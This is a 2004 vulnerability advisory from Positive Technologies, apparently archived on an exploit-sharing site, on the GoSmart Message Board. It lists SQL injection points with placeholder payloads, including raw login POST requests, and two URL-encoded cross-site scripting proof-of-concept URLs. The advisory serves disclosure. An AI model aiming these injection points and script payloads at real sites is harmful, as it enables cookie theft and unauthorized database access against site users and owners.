gosmart.txt

gosmart.txt: Posted Oct 13, 2004; Authored by Positive Technologies | Site ptsecurity.com; Multiple vulnerabilities were found in the GoSmart Message Board. A remote user can conduct SQL injection and cross site scripting attacks. Exploitation examples provided.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 3883551b72d84d43a2a3267c598f7a044bcfcc697816708e9381717b65e1842b; Download | Favorite | View

gosmart.txt

This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).
 

Date: 11.10.04

Severity: Low

 

Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx

 

Platform: ASP

 

I. DESCRIPTION

--------------

Multiple vulnerabilities were found in GoSmart Message Board. A remote
user can conduct SQL injection attack and Cross site scripting attack. 



1. SQL injection (minimal risk, because using Access database)

 
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1

messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1

messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1 
Host: www.gosmart4u.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 

Username=[SQL CODE HERE]&Password=1&Login=1 


POST /messageboard/Login_Exec.asp HTTP/1.1 
Host: www.gosmart4u.com 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 

Username=1&Password=[SQL CODE HERE]&Login=1

 
2. XSS:

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E%3C%22

/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%
28%29%3C%2Fscript%3E%3C%22


 

II. IMPACT

----------


A remote user can access the target user's cookies (including
authentication cookies).   

A remote user can cause SQL commands to be executed by the underlying
database.

 


III. SOLUTION

-------------
Not available currently.

 

IV. VENDOR FIX/RESPONSE

-----------------------
n/a
 

V. CREDIT

-------------
Positive Technologies (www.ptsecurity.com) is information security
company especially focused on development of MaxPatrol - professional
security scanner.

Top Authors In Last 30 Days

Red Hat 287 files
Ubuntu 60 files
Gentoo 32 files
Debian 28 files
Apple 9 files
malvuln 6 files
Jann Horn 5 files
Ahmet Umit Bayram 5 files
nu11secur1ty 5 files
Google Security Research 5 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,642)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,788)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,504)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

gosmart.txt

gosmart.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

gosmart.txt

Share This

gosmart.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems